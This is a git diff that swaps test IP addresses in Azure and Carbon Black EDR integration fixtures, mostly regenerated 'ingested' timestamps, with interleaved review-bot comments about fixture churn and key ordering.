+ "id": "/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC",
+ "provider": "MICROSOFT.APPPLATFORM/SPRING",
+ "group": "SA-HEMANT"
+ },
+ "springcloudlogs": {
+ "operation_name": "Microsoft.AppPlatform/Spring/logs",
+ "log_format": "RAW",
+ "category": "ApplicationConsole",
+ "event_category": "Administrative",
+ "properties": {
+ "app_name": "admin-server",
+ "instance_name": "admin-server-default-12-8459d44f68-g4b5f",
+ "stream": "stdout",
+ "service_name": "hm-sc-petclinic",
+ "service_id": "c41fd000b1a5450eb234039376da26de"
+ }
+ }
+ }
 }
 ]
 }
\ No newline at end of file
diff --git a/packages/azure/docs/README.md b/packages/azure/docs/README.md
index 2de6c43a48f..3b72a2bb244 100644
--- a/packages/azure/docs/README.md
+++ b/packages/azure/docs/README.md
@@ -234,6 +234,8 @@ An example event for `activitylogs` looks as following:
 | geo.country_iso_code | Country ISO code. | keyword |
 | geo.country_name | Country name. | keyword |
 | geo.location | Longitude and latitude. | geo_point |
+| geo.region_iso_code | Region ISO code. | keyword |
+| geo.region_name | Region name. | keyword |
 | host.architecture | Operating system architecture. | keyword |
 | host.containerized | If the host is a container. | boolean |
 | host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword |
diff --git a/packages/azure/docs/activitylogs.md b/packages/azure/docs/activitylogs.md
index eafa43d497d..01e69aa8c0b 100644
--- a/packages/azure/docs/activitylogs.md
+++ b/packages/azure/docs/activitylogs.md
@@ -223,6 +223,8 @@ An example event for `activitylogs` looks as following:
 | geo.country_iso_code | Country ISO code. | keyword |
 | geo.country_name | Country name. | keyword |
 | geo.location | Longitude and latitude. | geo_point |
+| geo.region_iso_code | Region ISO code. | keyword |
+| geo.region_name | Region name. | keyword |
 | host.architecture | Operating system architecture. | keyword |
 | host.containerized | If the host is a container. | boolean |
 | host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword |
diff --git a/packages/azure/manifest.yml b/packages/azure/manifest.yml
index db7aa13d2e1..b94220976e6 100644
--- a/packages/azure/manifest.yml
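Review bot: Nothing in this springcloudlogs expected file references an IP, so the only substantive change in the hunk is the added `"ingested": "2021-12-09T13:31:00.534484200Z"` line; the other ~50 changed lines are the same keys re-emitted in pipeline output order instead of the sorted order the old file had (`@timestamp`, `azure`, `event` and `geo` all move, and `- ]` becomes `+ ],` only to make room for the relocated `azure` block). That turns a one-line change into what reads as a whole-file rewrite and will flip back the next time the file is regenerated with a sorting tool. Regenerating with stable key ordering, or limiting this file to the `ingested` line if it is needed at all, would keep the diff reviewable.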
+++ b/packages/azure/manifest.yml
@@ -1,6 +1,6 @@
 name: azure
 title: Azure Logs
-version: 0.12.0
+version: 0.12.1
 release: beta
 description: This Elastic integration collects logs from Azure
 type: integration
diff --git a/packages/carbonblack_edr/_dev/deploy/docker/sample_logs/cb_edr.ndjson.log b/packages/carbonblack_edr/_dev/deploy/docker/sample_logs/cb_edr.ndjson.log
index 88960c3e0ea..334e4295725 100644
--- a/packages/carbonblack_edr/_dev/deploy/docker/sample_logs/cb_edr.ndjson.log
+++ b/packages/carbonblack_edr/_dev/deploy/docker/sample_logs/cb_edr.ndjson.log
@@ -1,8 +1,8 @@ {"server_name":"cb-enterprise-testing.local","docs":[{"process_md5":"a3ccfd0aa0b17fd23aa9fd0d84b86c05","sensor_id":1,"modload_count":49,"parent_unique_id":"00000001-0000-09e4-01cf-a5dee70168f2-00000001","cmdline":"\"c:\\users\\admin\\desktop\\putty.exe\" ","filemod_count":0,"id":"00000001-0000-afbc-01cf-b31b9e83777f","parent_name":"explorer.exe","parent_md5":"332feab1435662fc6c672e25beb37be3","group":"Default Group","hostname":"WIN8-TEST","last_update":"2014-08-08T15:15:47.544Z","start":"2014-08-08T15:15:42.193Z","regmod_count":6,"process_pid":44988,"username":"win8-test\\admin","process_name":"putty.exe","path":"c:\\users\\admin\\desktop\\putty.exe","netconn_count":1,"parent_pid":2532,"segment_id":1,"host_type":"workstation","os_type":"windows","childproc_count":0,"unique_id":"00000001-0000-afbc-01cf-b31b9e83777f-00000001"}],"event_timestamp":1407362104.19,"watchlist_id":10,"cb_version":"4.2.1.140808.1059","watchlist_name":"Tor Feed"} {"server_name":"cb-enterprise-testing.local","docs":[{"digsig_result":"Signed","observed_filename":["c:\\windows\\system32\\prncache.dll"],"product_version":"6.1.7601.17514","signed":"Signed","digsig_sign_time":"2010-11-21T00:37:00Z","is_executable_image":true,"orig_mod_len":183808,"is_64bit":true,"digsig_publisher":"Microsoft Corporation","group":["Default Group"],"file_version":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","company_name":"Microsoft Corporation","internal_name":"PrintCache","product_name":"Microsoft® Windows® Operating System","digsig_result_code":"0","timestamp":"2014-08-09T11:19:04.009Z","copied_mod_len":183808,"server_added_timestamp":"2014-08-09T11:19:04.009Z","md5":"A1CDE92DDC170D307DB3C5BAA348811B","endpoint":["WIN8-TEST|1"],"legal_copyright":"© Microsoft Corporation. 
All rights reserved.","original_filename":"PrnCache.dll","os_type":"Windows","file_desc":"Print UI Cache"}],"event_timestamp":1407583203.5,"watchlist_id":10,"cb_version":"4.2.1.140811.29","watchlist_name":"SRS Trust"} -{"process_id":"00000001-0000-afbc-01cf-b31b9e83777f","report_id":"TOR-Node-38.229.70.52","ioc_type":"ipv4","ioc_value":"38.229.70.52","ioc_attr":{"port":22,"protocol":"TCP","direction":"Outbound"},"hostname":"FS-NYC-1","sensor_id":1,"cb_version":"4.2.1.140808.1059","server_name":"localhost.localdomain","feed_id":14,"feed_name":"tor","event_timestamp":1407362000} +{"process_id":"00000001-0000-afbc-01cf-b31b9e83777f","report_id":"TOR-Node-81.2.69.144","ioc_type":"ipv4","ioc_value":"81.2.69.144","ioc_attr":{"port":22,"protocol":"TCP","direction":"Outbound"},"hostname":"FS-NYC-1","sensor_id":1,"cb_version":"4.2.1.140808.1059","server_name":"localhost.localdomain","feed_id":14,"feed_name":"tor","event_timestamp":1407362000} {"md5":"506708142BC63DABA64F2D3AD1DCD5BF","report_id":"dxmtest1_04","ioc_type":"md5","ioc_value":"506708142bc63daba64f2d3ad1dcd5bf","ioc_attr":{},"feed_id":7,"hostname":"FS-SEA-529","sensor_id":3321,"cb_version":"4.2.1.140808.1059","server_name":"localhost.localdomain","feed_name":"dxmtest1","event_timestamp":1397244093.682} -{"process_id":"00000001-0000-afbc-01cf-b31b9e83777f","segment_id":1,"docs":{"modload_count":0,"host_type":"workstation","netconn_count":"1","os_type":"windows","unique_id":"00000001-0000-afbc-01cf-b31b9e83777f-00000001","username":"win8-test\\admin","last_update":"2014-08-08T15:15:47.544Z","parent_md5":"332feab1435662fc6c672e25beb37be3","path":"c:\\users\\admin\\desktop\\putty.exe","filemod_count":0,"regmod_count":6,"process_name":"putty.exe","cmdline":"\"c:\\users\\admin\\desktop\\putty.exe\" 
","parent_unique_id":"00000001-0000-09e4-01cf-a5dee70168f2-00000001","childproc_count":0,"process_pid":"44988","start":"2014-08-08T15:15:42.193Z","process_md5":"a3ccfd0aa0b17fd23aa9fd0d84b86c05","parent_name":"explorer.exe","parent_pid":"2532","group":"Default Group"},"report_id":"TOR-Node-38.229.70.52","ioc_type":"ipv4","ioc_value":"38.229.70.52","ioc_attr":{"port":"22","protocol":"TCP","direction":"Outbound"},"hostname":"WIN8-TEST","sensor_id":1,"cb_version":"4.2.1.140808.1059","server_name":"localhost","feed_id":14,"feed_name":"tor","event_timestamp":1407362099.567} +{"process_id":"00000001-0000-afbc-01cf-b31b9e83777f","segment_id":1,"docs":{"modload_count":0,"host_type":"workstation","netconn_count":"1","os_type":"windows","unique_id":"00000001-0000-afbc-01cf-b31b9e83777f-00000001","username":"win8-test\\admin","last_update":"2014-08-08T15:15:47.544Z","parent_md5":"332feab1435662fc6c672e25beb37be3","path":"c:\\users\\admin\\desktop\\putty.exe","filemod_count":0,"regmod_count":6,"process_name":"putty.exe","cmdline":"\"c:\\users\\admin\\desktop\\putty.exe\" ","parent_unique_id":"00000001-0000-09e4-01cf-a5dee70168f2-00000001","childproc_count":0,"process_pid":"44988","start":"2014-08-08T15:15:42.193Z","process_md5":"a3ccfd0aa0b17fd23aa9fd0d84b86c05","parent_name":"explorer.exe","parent_pid":"2532","group":"Default Group"},"report_id":"TOR-Node-81.2.69.144","ioc_type":"ipv4","ioc_value":"81.2.69.144","ioc_attr":{"port":"22","protocol":"TCP","direction":"Outbound"},"hostname":"WIN8-TEST","sensor_id":1,"cb_version":"4.2.1.140808.1059","server_name":"localhost","feed_id":14,"feed_name":"tor","event_timestamp":1407362099.567} {"md5":"C3489639EC8E181044F6C6BFD3D01AC9","docs":[{"file_version":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","product_name":"Microsoft Windows Operating 
System","is_executable_image":"true","digsig_result":"Signed","observed_filename":["c:\\windows\\system32\\sndvol.exe","C:\\Windows\\system32\\sndvol.exe"],"os_type":"Windows","orig_mod_len":"273920","company_name":"Microsoft Corporation","server_added_timestamp":"Aug 9, 2014 5:27:56 PM","internal_name":"Volume Control Applet","copied_mod_len":"0","product_version":"6.1.7601.17514","digsig_sign_time":"2010-11-21T00:37:00.000Z","alliance_score_srstrust":"-100","digsig_result_code":"0","file_desc":"Volume Mixer","endpoint":"WIN8-TEST|1","legal_copyright":"Microsoft Corporation. All rights reserved.","original_filename":"SndVol.exe","is_64bit":"true","md5":"C3489639EC8E181044F6C6BFD3D01AC9","digsig_publisher":"Microsoft Corporation","group":"Default Group"}],"report_id":"c3489639ec8e181044f6c6bfd3d01ac9","ioc_type":"md5","ioc_value":"c3489639ec8e181044f6c6bfd3d01ac9","ioc_attr":{},"hostname":"WIN8-TEST","sensor_id":1,"cb_version":"4.2.1.140811.1054","server_name":"localhost","feed_id":2,"feed_name":"srstrust","event_timestamp":1407621575.945} {"process_id":"00000001-0000-1098-01cf-cc5fea563f8f","sensor_id":1,"segment_id":1,"docs":[{"username":"WIN7X64-BUILDER\\User","process_md5":"f2c7bb8acc97f92e987a2d4087d021b1","modload_count":20,"parent_unique_id":"00000001-0000-0a84-01cf-c240c9d1f378-00000001","process_name":"notepad.exe","cmdline":"\"c:\\windows\\system32\\notepad.exe\" ","os_type":"windows","path":"c:\\windows\\system32\\notepad.exe","last_update":"2014-09-09T18:57:34.267Z","parent_pid":2692,"crossproc_count":0,"parent_name":"explorer.exe","parent_md5":"000000000000000000000000000000","group":"Default 
Group","netconn_count":0,"hostname":"WIN7X64-BUILDER","host_type":"workstation","filemod_count":0,"start":"2014-09-09T18:57:34.251Z","unique_id":"00000001-0000-1098-01cf-cc5fea563f8f-00000001","regmod_count":0,"childproc_count":0,"process_pid":4248}],"hostname":"DXM021-VM1","event_timestamp":1410289221.38,"feed_name":"dxmtest2","feed_id":12,"ioc_value":"cb.urlver=1&cb.q.process_name=notepad.exe&sort=start%20desc&rows=10&start=0","ioc_type":"query","ioc_attrs":{"highlights":["PREPREPREnotepad.exePOSTPOSTPOST","c:\\windows\\system32\\PREPREPREnotepad.exePOSTPOSTPOST"]},"report_id":"notepad_proc"} {"sensor_id":1,"docs":[{"host_count":1,"digsig_result":"Unsigned","observed_filename":["c:\\program files (x86)\\programmer's notepad\\pn.exe"],"product_version":"2.3.4.0-charles","signed":"Unsigned","is_executable_image":false,"orig_mod_len":3092992,"is_64bit":false,"group":["Default Group"],"file_version":"2.3.4.0","company_name":"Simon Steele (Echo Software)","internal_name":"PNWTL","product_name":"Programmer's Notepad","digsig_result_code":"2148204800","timestamp":"2014-09-09T21:00:29.875Z","copied_mod_len":3092992,"server_added_timestamp":"2014-09-09T21:00:29.875Z","md5":"EFA7ECAF4468E0106E8B1041C5CE450E","endpoint":["WIN7X64-BUILDER|1"],"legal_copyright":"Copyright © 2002-2010 Simon Steele (Echo Software)","original_filename":"pn.exe","os_type":"Windows","file_desc":"Programmer's Notepad 2","last_seen":"2014-09-09T21:00:29.875Z"}],"hostname":"DXM021-VM1","event_timestamp":1410296635.26,"feed_name":"dxmtest2","feed_id":12,"ioc_value":"cb.urlver=1&cb.q.process_name=notepad.exe&sort=start%20desc&rows=10&start=0","ioc_type":"query","md5":"EFA7ECAF4468E0106E8B1041C5CE450E","report_id":"Newly Loaded Modules"} diff --git a/packages/carbonblack_edr/changelog.yml b/packages/carbonblack_edr/changelog.yml index 68a20ac43db..3503668c17d 100644 --- a/packages/carbonblack_edr/changelog.yml +++ b/packages/carbonblack_edr/changelog.yml 
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.3.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "0.3.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json
index 27615ab2c83..50537bb54c7 100644
--- a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json
+++ b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json
@@ -376,9 +376,9 @@
 "sensor_id": 1,
 "cb_version": "4.2.1.140808.1059",
 "server_name": "localhost.localdomain",
- "report_id": "TOR-Node-38.229.70.52",
+ "report_id": "TOR-Node-81.2.69.144",
 "ioc_type": "ipv4",
- "ioc_value": "38.229.70.52",
+ "ioc_value": "81.2.69.144",
 "feed_name": "tor",
 "event_timestamp": 1407362000
 },
@@ -628,7 +628,7 @@
 "group": "Default Group",
 "unique_id": "00000001-0000-afbc-01cf-b31b9e83777f-00000001"
 },
- "report_id": "TOR-Node-38.229.70.52",
+ "report_id": "TOR-Node-81.2.69.144",
 "sensor_id": 1,
 "segment_id": 1,
 "ioc_attr": {
@@ -636,7 +636,7 @@
 "port": "22",
 "protocol": "TCP"
 },
- "ioc_value": "38.229.70.52",
+ "ioc_value": "81.2.69.144",
 "hostname": "WIN8-TEST",
 "server_name": "localhost"
 }
diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json
index 6e342ce6339..9466d8b1c80 100644
--- a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json
+++ b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json
@@ -25,7 +25,7 @@
 },
 "event": {
 "action": "binaryinfo.group.observed",
- "ingested": "2021-08-17T19:44:42.797126500Z",
+ "ingested": "2021-12-09T13:31:11.837643800Z",
 "category": [
 "file"
 ],
@@ -64,7 +64,7 @@
 },
 "event": {
 "action": "binaryinfo.group.observed",
- "ingested": "2021-08-17T19:44:42.797143800Z",
+ "ingested": "2021-12-09T13:31:11.837650800Z",
 "category": [
 "file"
 ],
@@ -101,7 +101,7 @@
 },
 "event": {
 "action": "binaryinfo.observed",
- "ingested": "2021-08-17T19:44:42.797153600Z",
+ "ingested": "2021-12-09T13:31:11.837656700Z",
 "category": [
 "file"
 ],
@@ -140,7 +140,7 @@
 },
 "event": {
 "action": "binaryinfo.group.observed",
- "ingested": "2021-08-17T19:44:42.797162100Z",
+ "ingested": "2021-12-09T13:31:11.837663300Z",
 "category": [
 "file"
 ],
@@ -179,7 +179,7 @@
 },
 "event": {
 "action": "binaryinfo.group.observed",
- "ingested": "2021-08-17T19:44:42.797170300Z",
+ "ingested": "2021-12-09T13:31:11.837667900Z",
 "category": [
 "file"
 ],
@@ -216,7 +216,7 @@
 },
 "event": {
 "action": "binaryinfo.observed",
- "ingested": "2021-08-17T19:44:42.797178700Z",
+ "ingested": "2021-12-09T13:31:11.837671800Z",
 "category": [
 "file"
 ],
@@ -255,7 +255,7 @@
 },
 "event": {
 "action": "binaryinfo.group.observed",
- "ingested": "2021-08-17T19:44:42.797187Z",
+ "ingested": "2021-12-09T13:31:11.837676800Z",
 "category": [
 "file"
 ],
@@ -294,7 +294,7 @@
 },
 "event": {
 "action": "binaryinfo.group.observed",
- "ingested": "2021-08-17T19:44:42.797195400Z",
+ "ingested": "2021-12-09T13:31:11.837682200Z",
 "category": [
 "file"
 ],
@@ -333,7 +333,7 @@
 },
 "event": {
 "action": "binaryinfo.group.observed",
- "ingested": "2021-08-17T19:44:42.797203600Z",
+ "ingested": "2021-12-09T13:31:11.837687900Z",
 "category": [
 "file"
 ],
@@ -420,7 +420,7 @@
 },
 "event": {
 "action": "unknown",
- "ingested": "2021-08-17T19:44:42.797211700Z",
+ "ingested": "2021-12-09T13:31:11.837694200Z",
 "kind": "event"
 }
 },
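Review bot: Every hunk of test-events.json-expected.json on this line and on through the `@@ -4511` hunk rewrites only `event.ingested`, which records when the fixture was regenerated rather than what the pipeline produces, so the file will churn the same way on the next regeneration and the four substantive lines (`report_id` and `threatintel.indicator.ip` in the `@@ -717`, `@@ -732`, `@@ -1154` and `@@ -1177` hunks) are buried among dozens of timestamp-only hunks. If the test's config file next to test-events.json does not already declare it, marking the field as dynamic, `dynamic_fields:` / `  event.ingested: ".*"`, would keep it out of the expected output; that option name is from elastic-package's pipeline-test conventions, so confirm it against the version the repo pins. Worth noting too that the `@@ -732,14 +732,14 @@` and `@@ -1177,7 +1177,7 @@` hunks add no `geo.*` fields for the new indicator address, so in this package the move to a test-database IP changes no observable enrichment, which is fine if the pipeline is not meant to geolocate `threatintel.indicator.ip` but is worth confirming as intended.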
@@ -448,7 +448,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797219900Z", + "ingested": "2021-12-09T13:31:11.837700600Z", "category": [ "file" ], @@ -491,7 +491,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797228400Z", + "ingested": "2021-12-09T13:31:11.837707200Z", "category": [ "file" ], @@ -585,7 +585,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797236700Z", + "ingested": "2021-12-09T13:31:11.837713500Z", "kind": "event" } }, @@ -613,7 +613,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797247900Z", + "ingested": "2021-12-09T13:31:11.837719700Z", "category": [ "file" ], @@ -657,7 +657,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797256700Z", + "ingested": "2021-12-09T13:31:11.837725900Z", "kind": "event" }, "tags": [ @@ -690,7 +690,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797265Z", + "ingested": "2021-12-09T13:31:11.837732100Z", "category": [ "file" ], @@ -717,7 +717,7 @@ "sensor_id": 1, "process_id": "00000001-0000-afbc-01cf-b31b9e83777f", "ioc_attr": {}, - "report_id": "TOR-Node-38.229.70.52", + "report_id": "TOR-Node-81.2.69.144", "event_timestamp": 1.407362E9, "feed_id": 14, "feed_name": "tor" @@ -732,14 +732,14 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797273700Z", + "ingested": "2021-12-09T13:31:11.837738500Z", "kind": "event" }, "threatintel": { "indicator": { "type": "ipv4-addr", "port": 22, - "ip": "38.229.70.52" + "ip": "81.2.69.144" } }, "tags": [ @@ -775,7 +775,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797282Z", + "ingested": "2021-12-09T13:31:11.837744600Z", "category": [ "file" ], 
@@ -819,7 +819,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797290300Z", + "ingested": "2021-12-09T13:31:11.837750800Z", "kind": "event" }, "tags": [ @@ -852,7 +852,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797298500Z", + "ingested": "2021-12-09T13:31:11.837757Z", "category": [ "file" ], @@ -902,7 +902,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797306700Z", + "ingested": "2021-12-09T13:31:11.837763200Z", "category": [ "network" ], @@ -945,7 +945,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797314700Z", + "ingested": "2021-12-09T13:31:11.837771300Z", "kind": "event" }, "threatintel": { @@ -986,7 +986,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797323200Z", + "ingested": "2021-12-09T13:31:11.837777800Z", "category": [ "file" ], @@ -1030,7 +1030,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797331600Z", + "ingested": "2021-12-09T13:31:11.837784300Z", "kind": "event" }, "tags": [ @@ -1063,7 +1063,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797339900Z", + "ingested": "2021-12-09T13:31:11.837790600Z", "category": [ "file" ], @@ -1114,7 +1114,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797348100Z", + "ingested": "2021-12-09T13:31:11.837796800Z", "category": [ "network" ], @@ -1154,7 +1154,7 @@ "sensor_id": 1, "process_id": "00000001-0000-afbc-01cf-b31b9e83777f", "ioc_attr": {}, - "report_id": "TOR-Node-38.229.70.52", + "report_id": "TOR-Node-81.2.69.144", "doc": { "netconn_count": "1", "childproc_count": 0, @@ -1177,7 +1177,7 @@ "indicator": { "type": "ipv4-addr", "port": 22, - "ip": "38.229.70.52" + "ip": "81.2.69.144" } }, "tags": [ 
@@ -1213,7 +1213,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797356100Z", + "ingested": "2021-12-09T13:31:11.837803Z", "kind": "event" } }, @@ -1251,7 +1251,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797364400Z", + "ingested": "2021-12-09T13:31:11.837809200Z", "category": [ "registry" ], @@ -1289,7 +1289,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797372500Z", + "ingested": "2021-12-09T13:31:11.837815400Z", "category": [ "file" ], @@ -1333,7 +1333,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797381Z", + "ingested": "2021-12-09T13:31:11.837821600Z", "kind": "event" }, "tags": [ @@ -1368,7 +1368,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797389100Z", + "ingested": "2021-12-09T13:31:11.837827900Z", "category": [ "file" ], @@ -1419,7 +1419,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797397400Z", + "ingested": "2021-12-09T13:31:11.837834100Z", "category": [ "network" ], @@ -1524,7 +1524,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797405400Z", + "ingested": "2021-12-09T13:31:11.837840400Z", "kind": "event" } }, @@ -1562,7 +1562,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797413800Z", + "ingested": "2021-12-09T13:31:11.837846800Z", "category": [ "registry" ], @@ -1600,7 +1600,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797422200Z", + "ingested": "2021-12-09T13:31:11.837853100Z", "category": [ "file" ], @@ -1637,7 +1637,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797466500Z", + "ingested": "2021-12-09T13:31:11.837859400Z", "category": [ "process", "driver" 
@@ -1682,7 +1682,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797475300Z", + "ingested": "2021-12-09T13:31:11.837865700Z", "kind": "event" }, "tags": [ @@ -1717,7 +1717,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797483500Z", + "ingested": "2021-12-09T13:31:11.837871900Z", "category": [ "file" ], @@ -1770,7 +1770,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797491900Z", + "ingested": "2021-12-09T13:31:11.837878700Z", "category": [ "network" ], @@ -1861,7 +1861,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797500200Z", + "ingested": "2021-12-09T13:31:11.837885Z", "kind": "event" }, "tags": [ @@ -1903,7 +1903,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797508600Z", + "ingested": "2021-12-09T13:31:11.837891200Z", "category": [ "registry" ], @@ -1941,7 +1941,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797516800Z", + "ingested": "2021-12-09T13:31:11.837897300Z", "category": [ "file" ], @@ -1978,7 +1978,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797528500Z", + "ingested": "2021-12-09T13:31:11.837903400Z", "category": [ "process", "driver" @@ -2023,7 +2023,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797537Z", + "ingested": "2021-12-09T13:31:11.837909700Z", "category": [ "host" ], @@ -2067,7 +2067,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797545400Z", + "ingested": "2021-12-09T13:31:11.837915900Z", "kind": "event" }, "tags": [ @@ -2102,7 +2102,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797553700Z", + "ingested": "2021-12-09T13:31:11.837922100Z", "category": [ "file" ], 
@@ -2153,7 +2153,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797562100Z", + "ingested": "2021-12-09T13:31:11.837928100Z", "category": [ "network" ], @@ -2242,7 +2242,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797572700Z", + "ingested": "2021-12-09T13:31:11.837934200Z", "kind": "event" }, "tags": [ @@ -2284,7 +2284,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797581100Z", + "ingested": "2021-12-09T13:31:11.837940400Z", "category": [ "registry" ], @@ -2322,7 +2322,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797589300Z", + "ingested": "2021-12-09T13:31:11.837946500Z", "category": [ "file" ], @@ -2359,7 +2359,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797597700Z", + "ingested": "2021-12-09T13:31:11.837952800Z", "category": [ "process", "driver" @@ -2404,7 +2404,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797606100Z", + "ingested": "2021-12-09T13:31:11.837959100Z", "category": [ "host" ], @@ -2448,7 +2448,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797614300Z", + "ingested": "2021-12-09T13:31:11.837965300Z", "kind": "event" }, "tags": [ @@ -2494,7 +2494,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797622500Z", + "ingested": "2021-12-09T13:31:11.837971600Z", "category": [ "process" ], @@ -2536,7 +2536,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797630800Z", + "ingested": "2021-12-09T13:31:11.837977800Z", "category": [ "file" ], @@ -2587,7 +2587,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797638900Z", + "ingested": "2021-12-09T13:31:11.837984Z", "category": [ "network" ], 
@@ -2623,7 +2623,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797647100Z", + "ingested": "2021-12-09T13:31:11.837990200Z", "kind": "event" }, "tags": [ @@ -2665,7 +2665,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797655300Z", + "ingested": "2021-12-09T13:31:11.837996400Z", "category": [ "registry" ], @@ -2703,7 +2703,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797663600Z", + "ingested": "2021-12-09T13:31:11.838002600Z", "category": [ "file" ], @@ -2740,7 +2740,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797671900Z", + "ingested": "2021-12-09T13:31:11.838008700Z", "category": [ "process", "driver" @@ -2785,7 +2785,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797680300Z", + "ingested": "2021-12-09T13:31:11.838014900Z", "category": [ "host" ], @@ -2829,7 +2829,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797688400Z", + "ingested": "2021-12-09T13:31:11.838021200Z", "kind": "event" }, "tags": [ @@ -2875,7 +2875,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797696600Z", + "ingested": "2021-12-09T13:31:11.838027500Z", "category": [ "process" ], @@ -2917,7 +2917,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797704900Z", + "ingested": "2021-12-09T13:31:11.838033800Z", "category": [ "file" ], @@ -2967,7 +2967,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797713100Z", + "ingested": "2021-12-09T13:31:11.838040200Z", "category": [ "network" ], @@ -3011,7 +3011,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797721400Z", + "ingested": "2021-12-09T13:31:11.838046500Z", "kind": "event" }, "tags": [ 
